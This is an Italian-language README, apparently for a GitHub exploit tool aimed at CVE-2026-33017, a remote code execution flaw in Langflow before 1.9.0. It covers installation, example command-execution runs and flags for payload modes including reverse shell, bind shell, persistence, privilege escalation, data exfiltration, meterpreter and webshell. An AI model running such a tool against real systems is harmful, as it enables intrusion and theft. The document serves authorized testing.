
Strumento di sfruttamento di CVE-2026-33017 per Langflow <1.9.0. Include reverse shell, esecuzione di comandi, operazioni su file, persistenza e test automatizzati. Convalida l'impatto della vulnerabilità critica RCE. Solo per test di sicurezza autorizzati.
CVE-2026-33017 · Test di sicurezza autorizzati per esecuzione remota di codice su Langflow
Strumenti di ricerca e red-team per la validazione di CVE-2026-33017 su istanze Langflow che si è esplicitamente autorizzati a valutare. Non per uso non autorizzato.
Questo progetto è destinato solo a:
L'accesso non autorizzato a sistemi informatici è illegale. Sei l'unico responsabile del rispetto delle leggi applicabili e dell'ottenimento di un'autorizzazione scritta prima di testare qualsiasi target. Gli autori non si assumono alcuna responsabilità per un uso improprio.
Framework Python asincrono per la valutazione di distribuzioni Langflow potenzialmente affette da CVE-2026-33017. Supporta controlli di vulnerabilità, selezione della modalità payload, esecuzione automatizzata di valutazioni e reportistica strutturata per la documentazione degli engagement.
--check-only non distruttiva--auto / batchhttpx con logging configurabileflow-id e client-id di Langflow per l'ambiente di testgit clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [options]
.
├── exploit.py # Main CLI & assessment engine
├── requirements.txt # Python dependencies
├── README.md # This file
└── venv/ # Local virtualenv (not for version control)
Se un target è vulnerabile a CVE-2026-33017:
--check-only per verificare la patch--check-only prima di qualsiasi modalità payloadContributi che migliorano l'affidabilità, la reportistica, l'accuratezza del rilevamento o la documentazione difensiva sono benvenuti. Apri un issue o una pull request con una descrizione chiara della modifica e di come è stata validata in un ambiente di laboratorio.
Fornito esclusivamente per test di sicurezza autorizzati e ricerca educativa.
Non viene fornita alcuna garanzia. Utilizzare a proprio rischio e nel rispetto della legge.
Sudeepa Wanigarathna
Per ricerca sulla sicurezza autorizzata · CVE-2026-33017
| Elemento | Dettaglio |
|---|
| CVE | CVE-2026-33017 |
| Target | Langflow |
| Mitigazione suggerita | Aggiornare Langflow ≥ 1.9.0 |
| Linguaggio | Python 3.10+ |
| Versione | 1.0.0 |
| Autore | Sudeepa Wanigarathna |
| Flag |
|---|
| Descrizione |
|---|
-u, --url | URL di base del target (es. http://127.0.0.1:7860) |
-f, --flow-id | ID del flusso Langflow |
-c, --client-id | Valore del cookie Client ID |
| Flag | Descrizione |
|---|
-t, --payload-type | reverse_shell, bind_shell, command_exec, file_read, file_upload, persistence, priv_esc, data_exfil, meterpreter, webshell, all (default: reverse_shell) |
-l, --lhost | Host listener (rilevato automaticamente se omesso, dove applicabile) |
-p, --lport | Porta listener (richiesta per modalità shell / meterpreter) |
--cmd | Stringa di comando (command_exec) |
--file-path | Percorso per modalità lettura/caricamento file |
--file-data | Contenuto da caricare (file_upload) |
| Flag | Descrizione |
|---|
--auto | Workflow di sfruttamento automatizzato |
--check-only | Solo controllo vulnerabilità |
--batch | Modalità batch |
--report | text | json | html | markdown |
--output-file | Scrive report/output in un file |
-v, --verbose | Logging verboso |
-q, --quiet | Solo errori |